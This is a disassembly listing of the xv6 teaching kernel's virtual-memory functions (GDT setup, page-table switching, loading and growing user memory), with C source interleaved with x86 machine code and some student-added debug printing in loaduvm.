SEG(STA_W, 0, 0xffffffff, DPL_USER); 801069d0: ba ff ff ff ff mov $0xffffffff,%edx 801069d5: 31 c9 xor %ecx,%ecx 801069d7: 66 89 90 30 28 11 80 mov %dx,-0x7feed7d0(%eax) // Map "logical" addresses to virtual addresses using identity map. // Cannot share a CODE descriptor for both kernel and user // because it would have to have DPL_USR, but the CPU forbids // an interrupt from CPL=0 to DPL=3. c = &cpus[cpuid()]; c->gdt[SEG_KCODE] = SEG(STA_X|STA_R, 0, 0xffffffff, 0); 801069de: c6 80 1c 28 11 80 00 movb $0x0,-0x7feed7e4(%eax) static inline void lgdt(struct segdesc *p, int size) { volatile ushort pd[3]; pd[0] = size-1; 801069e5: ba 2f 00 00 00 mov $0x2f,%edx 801069ea: c6 80 1d 28 11 80 9a movb $0x9a,-0x7feed7e3(%eax) 801069f1: c6 80 1e 28 11 80 cf movb $0xcf,-0x7feed7e2(%eax) 801069f8: c6 80 1f 28 11 80 00 movb $0x0,-0x7feed7e1(%eax) c->gdt[SEG_KDATA] = SEG(STA_W, 0, 0xffffffff, 0); 801069ff: c6 80 24 28 11 80 00 movb $0x0,-0x7feed7dc(%eax) 80106a06: c6 80 25 28 11 80 92 movb $0x92,-0x7feed7db(%eax) 80106a0d: c6 80 26 28 11 80 cf movb $0xcf,-0x7feed7da(%eax) 80106a14: c6 80 27 28 11 80 00 movb $0x0,-0x7feed7d9(%eax) c->gdt[SEG_UCODE] = SEG(STA_X|STA_R, 0, 0xffffffff, DPL_USER); 80106a1b: c6 80 2c 28 11 80 00 movb $0x0,-0x7feed7d4(%eax) 80106a22: c6 80 2d 28 11 80 fa movb $0xfa,-0x7feed7d3(%eax) 80106a29: c6 80 2e 28 11 80 cf movb $0xcf,-0x7feed7d2(%eax) 80106a30: c6 80 2f 28 11 80 00 movb $0x0,-0x7feed7d1(%eax) c->gdt[SEG_UDATA] = SEG(STA_W, 0, 0xffffffff, DPL_USER); 80106a37: 66 89 88 32 28 11 80 mov %cx,-0x7feed7ce(%eax) 80106a3e: c6 80 34 28 11 80 00 movb $0x0,-0x7feed7cc(%eax) 80106a45: c6 80 35 28 11 80 f2 movb $0xf2,-0x7feed7cb(%eax) 80106a4c: c6 80 36 28 11 80 cf movb $0xcf,-0x7feed7ca(%eax) 80106a53: c6 80 37 28 11 80 00 movb $0x0,-0x7feed7c9(%eax) lgdt(c->gdt, sizeof(c->gdt)); 80106a5a: 05 10 28 11 80 add $0x80112810,%eax 80106a5f: 66 89 55 f2 mov %dx,-0xe(%ebp) pd[1] = (uint)p; 80106a63: 66 89 45 f4 mov %ax,-0xc(%ebp) pd[2] = (uint)p >> 16; 80106a67: c1 e8 10 shr $0x10,%eax 80106a6a: 66 89 45 f6 mov %ax,-0xa(%ebp) asm volatile("lgdt (%0)" : : "r" (pd)); 80106a6e: 8d 45 f2 lea -0xe(%ebp),%eax 80106a71: 0f 01 10 lgdtl (%eax) } 80106a74: c9 leave 80106a75: c3 ret 80106a76: 8d 76 00 lea 0x0(%esi),%esi 80106a79: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80106a80 <switchkvm>: } static inline void lcr3(uint val) { asm volatile("movl %0,%%cr3" : : "r" (val)); 80106a80: a1 b0 64 11 80 mov 0x801164b0,%eax // Switch h/w page table register to the kernel-only page table, // for when no process is running. void switchkvm(void) { 80106a85: 55 push %ebp 80106a86: 89 e5 mov %esp,%ebp 80106a88: 05 00 00 00 80 add $0x80000000,%eax 80106a8d: 0f 22 d8 mov %eax,%cr3 lcr3(V2P(kpgdir)); // switch to the kernel page table } 80106a90: 5d pop %ebp 80106a91: c3 ret 80106a92: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80106a99: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80106aa0 <switchuvm>: // Switch TSS and h/w page table to correspond to process p. void switchuvm(struct proc *p) { 80106aa0: 55 push %ebp 80106aa1: 89 e5 mov %esp,%ebp 80106aa3: 57 push %edi 80106aa4: 56 push %esi 80106aa5: 53 push %ebx 80106aa6: 83 ec 1c sub $0x1c,%esp 80106aa9: 8b 75 08 mov 0x8(%ebp),%esi if(p == 0) 80106aac: 85 f6 test %esi,%esi 80106aae: 0f 84 cd 00 00 00 je 80106b81 <switchuvm+0xe1> panic("switchuvm: no process"); if(p->kstack == 0) 80106ab4: 8b 46 08 mov 0x8(%esi),%eax 80106ab7: 85 c0 test %eax,%eax 80106ab9: 0f 84 dc 00 00 00 je 80106b9b <switchuvm+0xfb> panic("switchuvm: no kstack"); if(p->pgdir == 0) 80106abf: 8b 7e 04 mov 0x4(%esi),%edi 80106ac2: 85 ff test %edi,%edi 80106ac4: 0f 84 c4 00 00 00 je 80106b8e <switchuvm+0xee> panic("switchuvm: no pgdir"); pushcli(); 80106aca: e8 11 da ff ff call 801044e0 <pushcli> mycpu()->gdt[SEG_TSS] = SEG16(STS_T32A, &mycpu()->ts, 80106acf: e8 0c cc ff ff call 801036e0 <mycpu> 80106ad4: 89 c3 mov %eax,%ebx 80106ad6: e8 05 cc ff ff call 801036e0 <mycpu> 80106adb: 89 c7 mov %eax,%edi 80106add: e8 fe cb ff ff call 801036e0 <mycpu> 80106ae2: 89 45 e4 mov %eax,-0x1c(%ebp) 80106ae5: 83 c7 08 add $0x8,%edi 80106ae8: e8 f3 cb ff ff call 801036e0 <mycpu> 80106aed: 8b 4d e4 mov -0x1c(%ebp),%ecx 80106af0: 83 c0 08 add $0x8,%eax 80106af3: ba 67 00 00 00 mov $0x67,%edx 80106af8: c1 e8 18 shr $0x18,%eax 80106afb: 66 89 93 98 00 00 00 mov %dx,0x98(%ebx) 80106b02: 66 89 bb 9a 00 00 00 mov %di,0x9a(%ebx) 80106b09: c6 83 9d 00 00 00 99 movb $0x99,0x9d(%ebx) 80106b10: c6 83 9e 00 00 00 40 movb $0x40,0x9e(%ebx) 80106b17: 83 c1 08 add $0x8,%ecx 80106b1a: 88 83 9f 00 00 00 mov %al,0x9f(%ebx) 80106b20: c1 e9 10 shr $0x10,%ecx 80106b23: 88 8b 9c 00 00 00 mov %cl,0x9c(%ebx) mycpu()->gdt[SEG_TSS].s = 0; mycpu()->ts.ss0 = SEG_KDATA << 3; mycpu()->ts.esp0 = (uint)p->kstack + KSTACKSIZE; // setting IOPL=0 in eflags *and* iomb beyond the tss segment limit // forbids I/O instructions (e.g., inb and outb) from user space mycpu()->ts.iomb = (ushort) 0xFFFF; 80106b29: bb ff ff ff ff mov $0xffffffff,%ebx panic("switchuvm: no pgdir"); pushcli(); mycpu()->gdt[SEG_TSS] = SEG16(STS_T32A, &mycpu()->ts, sizeof(mycpu()->ts)-1, 0); mycpu()->gdt[SEG_TSS].s = 0; 80106b2e: e8 ad cb ff ff call 801036e0 <mycpu> 80106b33: 80 a0 9d 00 00 00 ef andb $0xef,0x9d(%eax) mycpu()->ts.ss0 = SEG_KDATA << 3; 80106b3a: e8 a1 cb ff ff call 801036e0 <mycpu> 80106b3f: b9 10 00 00 00 mov $0x10,%ecx 80106b44: 66 89 48 10 mov %cx,0x10(%eax) mycpu()->ts.esp0 = (uint)p->kstack + KSTACKSIZE; 80106b48: e8 93 cb ff ff call 801036e0 <mycpu> 80106b4d: 8b 56 08 mov 0x8(%esi),%edx 80106b50: 8d 8a 00 10 00 00 lea 0x1000(%edx),%ecx 80106b56: 89 48 0c mov %ecx,0xc(%eax) // setting IOPL=0 in eflags *and* iomb beyond the tss segment limit // forbids I/O instructions (e.g., inb and outb) from user space mycpu()->ts.iomb = (ushort) 0xFFFF; 80106b59: e8 82 cb ff ff call 801036e0 <mycpu> 80106b5e: 66 89 58 6e mov %bx,0x6e(%eax) } static inline void ltr(ushort sel) { asm volatile("ltr %0" : : "r" (sel)); 80106b62: b8 28 00 00 00 mov $0x28,%eax 80106b67: 0f 00 d8 ltr %ax } static inline void lcr3(uint val) { asm volatile("movl %0,%%cr3" : : "r" (val)); 80106b6a: 8b 46 04 mov 0x4(%esi),%eax 80106b6d: 05 00 00 00 80 add $0x80000000,%eax 80106b72: 0f 22 d8 mov %eax,%cr3 ltr(SEG_TSS << 3); lcr3(V2P(p->pgdir)); // switch to process's address space popcli(); } 80106b75: 8d 65 f4 lea -0xc(%ebp),%esp 80106b78: 5b pop %ebx 80106b79: 5e pop %esi 80106b7a: 5f pop %edi 80106b7b: 5d pop %ebp // setting IOPL=0 in eflags *and* iomb beyond the tss segment limit // forbids I/O instructions (e.g., inb and outb) from user space mycpu()->ts.iomb = (ushort) 0xFFFF; ltr(SEG_TSS << 3); lcr3(V2P(p->pgdir)); // switch to process's address space popcli(); 80106b7c: e9 4f da ff ff jmp 801045d0 <popcli> // Switch TSS and h/w page table to correspond to process p. void switchuvm(struct proc *p) { if(p == 0) panic("switchuvm: no process"); 80106b81: 83 ec 0c sub $0xc,%esp 80106b84: 68 72 7b 10 80 push $0x80107b72 80106b89: e8 e2 97 ff ff call 80100370 <panic> if(p->kstack == 0) panic("switchuvm: no kstack"); if(p->pgdir == 0) panic("switchuvm: no pgdir"); 80106b8e: 83 ec 0c sub $0xc,%esp 80106b91: 68 9d 7b 10 80 push $0x80107b9d 80106b96: e8 d5 97 ff ff call 80100370 <panic> switchuvm(struct proc *p) { if(p == 0) panic("switchuvm: no process"); if(p->kstack == 0) panic("switchuvm: no kstack"); 80106b9b: 83 ec 0c sub $0xc,%esp 80106b9e: 68 88 7b 10 80 push $0x80107b88 80106ba3: e8 c8 97 ff ff call 80100370 <panic> 80106ba8: 90 nop 80106ba9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80106bb0 <inituvm>: // Load the initcode into address 0 of pgdir. // sz must be less than a page. void inituvm(pde_t *pgdir, char *init, uint sz) { 80106bb0: 55 push %ebp 80106bb1: 89 e5 mov %esp,%ebp 80106bb3: 57 push %edi 80106bb4: 56 push %esi 80106bb5: 53 push %ebx 80106bb6: 83 ec 1c sub $0x1c,%esp 80106bb9: 8b 75 10 mov 0x10(%ebp),%esi 80106bbc: 8b 45 08 mov 0x8(%ebp),%eax 80106bbf: 8b 7d 0c mov 0xc(%ebp),%edi char *mem; if(sz >= PGSIZE) 80106bc2: 81 fe ff 0f 00 00 cmp $0xfff,%esi // Load the initcode into address 0 of pgdir. // sz must be less than a page. void inituvm(pde_t *pgdir, char *init, uint sz) { 80106bc8: 89 45 e4 mov %eax,-0x1c(%ebp) char *mem; if(sz >= PGSIZE) 80106bcb: 77 49 ja 80106c16 <inituvm+0x66> panic("inituvm: more than a page"); mem = kalloc(); 80106bcd: e8 be b8 ff ff call 80102490 <kalloc> memset(mem, 0, PGSIZE); 80106bd2: 83 ec 04 sub $0x4,%esp { char *mem; if(sz >= PGSIZE) panic("inituvm: more than a page"); mem = kalloc(); 80106bd5: 89 c3 mov %eax,%ebx memset(mem, 0, PGSIZE); 80106bd7: 68 00 10 00 00 push $0x1000 80106bdc: 6a 00 push $0x0 80106bde: 50 push %eax 80106bdf: e8 ac da ff ff call 80104690 <memset> mappages(pgdir, 0, PGSIZE, V2P(mem), PTE_W|PTE_U); 80106be4: 58 pop %eax 80106be5: 8d 83 00 00 00 80 lea -0x80000000(%ebx),%eax 80106beb: b9 00 10 00 00 mov $0x1000,%ecx 80106bf0: 5a pop %edx 80106bf1: 6a 06 push $0x6 80106bf3: 50 push %eax 80106bf4: 31 d2 xor %edx,%edx 80106bf6: 8b 45 e4 mov -0x1c(%ebp),%eax 80106bf9: e8 52 fc ff ff call 80106850 <mappages> memmove(mem, init, sz); 80106bfe: 89 75 10 mov %esi,0x10(%ebp) 80106c01: 89 7d 0c mov %edi,0xc(%ebp) 80106c04: 83 c4 10 add $0x10,%esp 80106c07: 89 5d 08 mov %ebx,0x8(%ebp) } 80106c0a: 8d 65 f4 lea -0xc(%ebp),%esp 80106c0d: 5b pop %ebx 80106c0e: 5e pop %esi 80106c0f: 5f pop %edi 80106c10: 5d pop %ebp if(sz >= PGSIZE) panic("inituvm: more than a page"); mem = kalloc(); memset(mem, 0, PGSIZE); mappages(pgdir, 0, PGSIZE, V2P(mem), PTE_W|PTE_U); memmove(mem, init, sz); 80106c11: e9 2a db ff ff jmp 80104740 <memmove> inituvm(pde_t *pgdir, char *init, uint sz) { char *mem; if(sz >= PGSIZE) panic("inituvm: more than a page"); 80106c16: 83 ec 0c sub $0xc,%esp 80106c19: 68 b1 7b 10 80 push $0x80107bb1 80106c1e: e8 4d 97 ff ff call 80100370 <panic> 80106c23: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80106c29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80106c30 <loaduvm>: // Load a program segment into pgdir. addr must be page-aligned // and the pages from addr to addr+sz must already be mapped. int loaduvm(pde_t *pgdir, char *addr, struct inode *ip, uint offset, uint sz) { 80106c30: 55 push %ebp 80106c31: 89 e5 mov %esp,%ebp 80106c33: 57 push %edi 80106c34: 56 push %esi 80106c35: 53 push %ebx 80106c36: 83 ec 1c sub $0x1c,%esp 80106c39: 8b 7d 0c mov 0xc(%ebp),%edi uint i, pa, n; pte_t *pte; if((uint) addr % PGSIZE != 0) 80106c3c: f7 c7 ff 0f 00 00 test $0xfff,%edi 80106c42: 0f 85 d2 00 00 00 jne 80106d1a <loaduvm+0xea> panic("loaduvm: addr must be page aligned"); for(i = 0; i < sz; i+=PGSIZE) 80106c48: 8b 45 18 mov 0x18(%ebp),%eax 80106c4b: 31 db xor %ebx,%ebx 80106c4d: 85 c0 test %eax,%eax 80106c4f: 89 45 e4 mov %eax,-0x1c(%ebp) 80106c52: 75 1e jne 80106c72 <loaduvm+0x42> 80106c54: e9 92 00 00 00 jmp 80106ceb <loaduvm+0xbb> 80106c59: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80106c60: 81 c3 00 10 00 00 add $0x1000,%ebx 80106c66: 81 6d e4 00 10 00 00 subl $0x1000,-0x1c(%ebp) 80106c6d: 39 5d 18 cmp %ebx,0x18(%ebp) 80106c70: 76 79 jbe 80106ceb <loaduvm+0xbb> { if((pte = walkpgdir(pgdir, addr+i, 0)) == 0) 80106c72: 8b 45 08 mov 0x8(%ebp),%eax 80106c75: 8d 14 1f lea (%edi,%ebx,1),%edx 80106c78: 31 c9 xor %ecx,%ecx 80106c7a: e8 51 fb ff ff call 801067d0 <walkpgdir> 80106c7f: 85 c0 test %eax,%eax 80106c81: 0f 84 a0 00 00 00 je 80106d27 <loaduvm+0xf7> panic("loaduvm: address should exist"); for(z=0;z<sz;z+=PGSIZE) 80106c87: c7 05 c4 a5 10 80 00 movl $0x0,0x8010a5c4 80106c8e: 00 00 00 { virtual[i][z]=*(addr); 80106c91: 0f b6 0f movzbl (%edi),%ecx 80106c94: 8d 14 9b lea (%ebx,%ebx,4),%edx if((pte = walkpgdir(pgdir, addr+i, 0)) == 0) panic("loaduvm: address should exist"); for(z=0;z<sz;z+=PGSIZE) 80106c97: c7 05 c4 a5 10 80 00 movl $0x1000,0x8010a5c4 80106c9e: 10 00 00 { virtual[i][z]=*(addr); 80106ca1: 88 0c 95 e0 5c 11 80 mov %cl,-0x7feea320(,%edx,4) } pa = PTE_ADDR(*pte); if(sz - i < PGSIZE) 80106ca8: 8b 4d e4 mov -0x1c(%ebp),%ecx 80106cab: ba 00 10 00 00 mov $0x1000,%edx virtual[i][z]=*(addr); } pa = PTE_ADDR(*pte); 80106cb0: 8b 00 mov (%eax),%eax 80106cb2: 25 00 f0 ff ff and $0xfffff000,%eax if(sz - i < PGSIZE) 80106cb7: 81 f9 ff 0f 00 00 cmp $0xfff,%ecx 80106cbd: 0f 46 d1 cmovbe %ecx,%edx n = sz - i; else n = PGSIZE; if(readi(ip, P2V(pa), offset+i, n) != n) 80106cc0: 05 00 00 00 80 add $0x80000000,%eax 80106cc5: 52 push %edx virtual[i][z]=*(addr); } pa = PTE_ADDR(*pte); if(sz - i < PGSIZE) 80106cc6: 89 d6 mov %edx,%esi n = sz - i; else n = PGSIZE; if(readi(ip, P2V(pa), offset+i, n) != n) 80106cc8: 8b 55 14 mov 0x14(%ebp),%edx 80106ccb: 01 da add %ebx,%edx 80106ccd: 52 push %edx 80106cce: 50 push %eax 80106ccf: ff 75 10 pushl 0x10(%ebp) 80106cd2: e8 79 ac ff ff call 80101950 <readi> 80106cd7: 83 c4 10 add $0x10,%esp 80106cda: 39 c6 cmp %eax,%esi 80106cdc: 74 82 je 80106c60 <loaduvm+0x30> { cprintf("%x\n",virtual[k]); } return 0; } 80106cde: 8d 65 f4 lea -0xc(%ebp),%esp if(sz - i < PGSIZE) n = sz - i; else n = PGSIZE; if(readi(ip, P2V(pa), offset+i, n) != n) return -1; 80106ce1: b8 ff ff ff ff mov $0xffffffff,%eax { cprintf("%x\n",virtual[k]); } return 0; } 80106ce6: 5b pop %ebx 80106ce7: 5e pop %esi 80106ce8: 5f pop %edi 80106ce9: 5d pop %ebp 80106cea: c3 ret 80106ceb: bb e0 5c 11 80 mov $0x80115ce0,%ebx 80106cf0: be a8 5d 11 80 mov $0x80115da8,%esi 80106cf5: 8d 76 00 lea 0x0(%esi),%esi return -1; } for(int k=0;k<10;k++) { cprintf("%x\n",virtual[k]); 80106cf8: 83 ec 08 sub $0x8,%esp 80106cfb: 53 push %ebx 80106cfc: 68 bc 77 10 80 push $0x801077bc 80106d01: 83 c3 14 add $0x14,%ebx 80106d04: e8 57 99 ff ff call 80100660 <cprintf> n = PGSIZE; if(readi(ip, P2V(pa), offset+i, n) != n) return -1; } for(int k=0;k<10;k++) 80106d09: 83 c4 10 add $0x10,%esp 80106d0c: 39 de cmp %ebx,%esi 80106d0e: 75 e8 jne 80106cf8 <loaduvm+0xc8> { cprintf("%x\n",virtual[k]); } return 0; } 80106d10: 8d 65 f4 lea -0xc(%ebp),%esp for(int k=0;k<10;k++) { cprintf("%x\n",virtual[k]); } return 0; 80106d13: 31 c0 xor %eax,%eax } 80106d15: 5b pop %ebx 80106d16: 5e pop %esi 80106d17: 5f pop %edi 80106d18: 5d pop %ebp 80106d19: c3 ret { uint i, pa, n; pte_t *pte; if((uint) addr % PGSIZE != 0) panic("loaduvm: addr must be page aligned"); 80106d1a: 83 ec 0c sub $0xc,%esp 80106d1d: 68 6c 7c 10 80 push $0x80107c6c 80106d22: e8 49 96 ff ff call 80100370 <panic> for(i = 0; i < sz; i+=PGSIZE) { if((pte = walkpgdir(pgdir, addr+i, 0)) == 0) panic("loaduvm: address should exist"); 80106d27: 83 ec 0c sub $0xc,%esp 80106d2a: 68 cb 7b 10 80 push $0x80107bcb 80106d2f: e8 3c 96 ff ff call 80100370 <panic> 80106d34: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80106d3a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80106d40 <allocuvm>: // Allocate page tables and physical memory to grow process from oldsz to // newsz, which need not be page aligned. Returns new size or 0 on error. int allocuvm(pde_t *pgdir, uint oldsz, uint newsz) { 80106d40: 55 push %ebp 80106d41: 89 e5 mov %esp,%ebp 80106d43: 57 push %edi 80106d44: 56 push %esi 80106d45: 53 push %ebx 80106d46: 83 ec 0c sub $0xc,%esp 80106d49: 8b 7d 10 mov 0x10(%ebp),%edi char *mem; uint a; if(newsz >= KERNBASE) 80106d4c: 85 ff test %edi,%edi 80106d4e: 0f 88 ca 00 00 00 js 80106e1e <allocuvm+0xde> return 0; if(newsz < oldsz) 80106d54: 3b 7d 0c cmp 0xc(%ebp),%edi return oldsz; 80106d57: 8b 45 0c mov 0xc(%ebp),%eax char *mem; uint a; if(newsz >= KERNBASE) return 0; if(newsz < oldsz) 80106d5a: 0f 82 82 00 00 00 jb 80106de2 <allocuvm+0xa2> return oldsz; a = PGROUNDUP(oldsz); 80106d60: 8d 98 ff 0f 00 00 lea 0xfff(%eax),%ebx 80106d66: 81 e3 00 f0 ff ff and $0xfffff000,%ebx for(; a < newsz; a += PGSIZE){ 80106d6c: 39 df cmp %ebx,%edi 80106d6e: 77 43 ja 80106db3 <allocuvm+0x73> 80106d70: e9 bb 00 00 00 jmp 80106e30 <allocuvm+0xf0> 80106d75: 8d 76 00 lea 0x0(%esi),%esi if(mem == 0){ cprintf("allocuvm out of memory\n"); deallocuvm(pgdir, newsz, oldsz); return 0; } memset(mem, 0, PGSIZE); 80106d78: 83 ec 04 sub $0x4,%esp 80106d7b: 68 00 10 00 00 push $0x1000 80106d80: 6a 00 push $0x0 80106d82: 50 push %eax 80106d83: e8 08 d9 ff ff call 80104690 <memset> if(mappages(pgdir, (char*)a, PGSIZE, V2P(mem), PTE_W|PTE_U) < 0){ 80106d88: 58 pop %eax 80106d89: 8d 86 00 00 00 80 lea -0x80000000(%esi),%eax 80106d8f: b9 00 10 00 00 mov $0x1000,%ecx 80106d94: 5a pop %edx 80106d95: 6a 06 push $0x6 80106d97: 50 push %eax 80106d98: 89 da mov %ebx,%edx 80106d9a: 8b 45 08 mov 0x8(%ebp),%eax 80106d9d: e8 ae fa ff ff call 80106850 <mappages> 80106da2: 83 c4 10 add $0x10,%esp 80106da5: 85 c0 test %eax,%eax 80106da7: 78 47 js 80106df0 <allocuvm+0xb0> return 0; if(newsz < oldsz) return oldsz; a = PGROUNDUP(oldsz); for(; a < newsz; a += PGSIZE){ 80106da9: 81 c3 00 10 00 00 add $0x1000,%ebx 80106daf: 39 df cmp %ebx,%edi 80106db1: 76 7d jbe 80106e30 <allocuvm+0xf0> mem = kalloc(); 80106db3: e8 d8 b6 ff ff call 80102490 <kalloc> if(mem == 0){ 80106db8: 85 c0 test %eax,%eax if(newsz < oldsz) return oldsz; a = PGROUNDUP(oldsz); for(; a < newsz; a += PGSIZE){ mem = kalloc(); 80106dba: 89 c6 mov %eax,%esi if(mem == 0){ 80106dbc: 75 ba jne 80106d78 <allocuvm+0x38> cprintf("allocuvm out of memory\n"); 80106dbe: 83 ec 0c sub $0xc,%esp 80106dc1: 68 e9 7b 10 80 push $0x80107be9 80106dc6: e8 95 98 ff ff call 80100660 <cprintf> deallocuvm(pde_t *pgdir, uint oldsz, uint newsz) { pte_t *pte; uint a, pa; if(newsz >= oldsz) 80106dcb: 83 c4 10 add $0x10,%esp 80106dce: 3b 7d 0c cmp 0xc(%ebp),%edi 80106dd1: 76 4b jbe 80106e1e <allocuvm+0xde> 80106dd3: 8b 4d 0c mov 0xc(%ebp),%ecx 80106dd6: 8b 45 08 mov 0x8(%ebp),%eax 80106dd9: 89 fa mov %edi,%edx 80106ddb: e8 00 fb ff ff call 801068e0 <deallocuvm.part.0> for(; a < newsz; a += PGSIZE){ mem = kalloc(); if(mem == 0){ cprintf("allocuvm out of memory\n"); deallocuvm(pgdir, newsz, oldsz); return 0; 80106de0: 31 c0 xor %eax,%eax kfree(mem); return 0; } } return newsz; } 80106de2: 8d 65 f4 lea -0xc(%ebp),%esp 80106de5: 5b pop %ebx 80106de6: 5e pop %esi 80106de7: 5f pop %edi 80106de8: 5d pop %ebp 80106de9: c3 ret 80106dea: 8d b6 00 00 00 00 lea 0x0(%esi),%esi deallocuvm(pgdir, newsz, oldsz); return 0; } memset(mem, 0, PGSIZE); if(mappages(pgdir, (char*)a, PGSIZE, V2P(mem), PTE_W|PTE_U) < 0){ cprintf("allocuvm out of memory (2)\n"); 80106df0: 83 ec 0c sub $0xc,%esp 80106df3: 68 01 7c 10 80 push $0x80107c01 80106df8: e8 63 98 ff ff call 80100660 <cprintf> deallocuvm(pde_t *pgdir, uint oldsz, uint newsz) { pte_t *pte; uint a, pa; if(newsz >= oldsz) 80106dfd: 83 c4 10 add $0x10,%esp 80106e00: 3b 7d 0c cmp 0xc(%ebp),%edi 80106e03: 76 0d jbe 80106e12 <allocuvm+0xd2> 80106e05: 8b 4d 0c mov 0xc(%ebp),%ecx 80106e08: 8b 45 08 mov 0x8(%ebp),%eax 80106e0b: 89 fa mov %edi,%edx 80106e0d: e8 ce fa ff ff call 801068e0 <deallocuvm.part.0> } memset(mem, 0, PGSIZE); if(mappages(pgdir, (char*)a, PGSIZE, V2P(mem), PTE_W|PTE_U) < 0){ cprintf("allocuvm out of memory (2)\n"); deallocuvm(pgdir, newsz, oldsz); kfree(mem); 80106e12: 83 ec 0c sub $0xc,%esp 80106e15: 56 push %esi 80106e16: e8 c5 b4 ff ff call 801022e0 <kfree> return 0; 80106e1b: 83 c4 10 add $0x10,%esp } } return newsz; } 80106e1e: 8d 65 f4 lea -0xc(%ebp),%esp memset(mem, 0, PGSIZE); if(mappages(pgdir, (char*)a, PGSIZE, V2P(mem), PTE_W|PTE_U) < 0){ cprintf("allocuvm out of memory (2)\n"); deallocuvm(pgdir, newsz, oldsz); kfree(mem); return 0; 80106e21: 31 c0 xor %eax,%eax } } return newsz; } 80106e23: 5b pop %ebx 80106e24: 5e pop %esi 80106e25: 5f pop %edi 80106e26: 5d pop %ebp 80106e27: c3 ret 80106e28: 90 nop 80106e29: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80106e30: 8d 65 f4 lea -0xc(%ebp),%esp return 0; if(newsz < oldsz) return oldsz; a = PGROUNDUP(oldsz); for(; a < newsz; a += PGSIZE){ 80106e33: 89 f8 mov %edi,%eax kfree(mem); return 0; } } return newsz; } 80106e35: 5b pop %ebx 80106e36: 5e pop %esi 80106e37: 5f pop %edi 80106e38: 5d pop %ebp 80106e39: c3 ret 80106e3a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80106e40 <deallocuvm>: // newsz. oldsz and newsz need not be page-aligned, nor does newsz // need to be less than oldsz. oldsz can be larger than the actual // process size. Returns the new process size. int deallocuvm(pde_t *pgdir, uint oldsz, uint newsz) { 80106e40: 55 push %ebp 80106e41: 89 e5 mov %esp,%ebp 80106e43: 8b 55 0c mov 0xc(%ebp),%edx 80106e46: 8b 4d 10 mov 0x10(%ebp),%ecx 80106e49: 8b 45 08 mov 0x8(%ebp),%eax pte_t *pte; uint a, pa; if(newsz >= oldsz) 80106e4c: 39 d1 cmp %edx,%ecx 80106e4e: 73 10 jae 80106e60 <deallocuvm+0x20> kfree(v); *pte = 0; } } return newsz; } 80106e50: 5d pop %ebp 80106e51: e9 8a fa ff ff jmp 801068e0 <deallocuvm.part.0> 80106e56: 8d 76 00 lea 0x0(%esi),%esi 80106e59: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80106e60: 89 d0 mov %edx,%eax 80106e62: 5d pop %ebp 80106e63: c3 ret 80106e64: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80106e6a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80106e70 <freevm>: // Free a page table and all the physical memory pages // in the user part. void freevm(pde_t *pgdir) { 80106e70: 55 push %ebp 80106e71: 89 e5 mov %esp,%ebp 80106e73: 57 push %edi 80106e74: 56 push %esi 80106e75: 53 push %ebx 80106e76: 83 ec 0c sub $0xc,%esp 80106e79: 8b 75 08 mov 0x8(%ebp),%esi uint i; if(pgdir == 0) 80106e7c: 85 f6 test %esi,%esi 80106e7e: 74 59 je 80106ed9 <freevm+0x69> 80106e80: 31 c9 xor %ecx,%ecx 80106e82: ba 00 00 00 80 mov $0x80000000,%edx 80106e87: 89 f0 mov %esi,%eax 80106e89: e8 52 fa ff ff call 801068e0 <deallocuvm.part.0> 80106e8e: 89 f3 mov %esi,%ebx 80106e90: 8d be 00 10 00 00 lea 0x1000(%esi),%edi 80106e96: eb 0f jmp 80106ea7 <freevm+0x37> 80106e98: 90 nop 80106e99: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80106ea0: 83 c3 04 add $0x4,%ebx panic("freevm: no pgdir"); deallocuvm(pgdir, KERNBASE, 0); for(i = 0; i < NPDENTRIES; i++){ 80106ea3: 39 fb cmp %edi,%ebx 80106ea5: 74 23 je 80106eca <freevm+0x5a> if(pgdir[i] & PTE_P){ 80106ea7: 8b 03 mov (%ebx),%eax 80106ea9: a8 01 test $0x1,%al 80106eab: 74 f3 je 80106ea0 <freevm+0x30> char * v = P2V(PTE_ADDR(pgdir[i])); kfree(v); 80106ead: 25 00 f0 ff ff and $0xfffff000,%eax 80106eb2: 83 ec 0c sub $0xc,%esp 80106eb5: 83 c3 04 add $0x4,%ebx 80106eb8: 05 00 00 00 80 add $0x80000000,%eax 80106ebd: 50 push %eax 80106ebe: e8 1d b4 ff ff call 801022e0 <kfree> 80106ec3: 83 c4 10 add $0x10,%esp uint i; if(pgdir == 0) panic("freevm: no pgdir"); deallocuvm(pgdir, KERNBASE, 0); for(i = 0; i < NPDENTRIES; i++){ 80106ec6: 39 fb cmp %edi,%ebx 80106ec8: 75 dd jne 80106ea7 <freevm+0x37> if(pgdir[i] & PTE_P){ char * v = P2V(PTE_ADDR(pgdir[i])); kfree(v); } } kfree((char*)pgdir); 80106eca: 89 75 08 mov %esi,0x8(%ebp) } 80106ecd: 8d 65 f4 lea -0xc(%ebp),%esp 80106ed0: 5b pop %ebx 80106ed1: 5e pop %esi 80106ed2: 5f pop %edi 80106ed3: 5d pop %ebp if(pgdir[i] & PTE_P){ char * v = P2V(PTE_ADDR(pgdir[i])); kfree(v); } } kfree((char*)pgdir); 80106ed4: e9 07 b4 ff ff jmp 801022e0 <kfree> freevm(pde_t *pgdir) { uint i; if(pgdir == 0) panic("freevm: no pgdir"); 80106ed9: 83 ec 0c sub $0xc,%esp 80106edc: 68 1d 7c 10 80 push $0x80107c1d 80106ee1: e8 8a 94 ff ff call 80100370 <panic> 80106ee6: 8d 76 00 lea 0x0(%esi),%esi 80106ee9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80106ef0 <setupkvm>: }; // Set up kernel part of a page table. pde_t* setupkvm(void) { 80106ef0: 55 push %ebp 80106ef1: 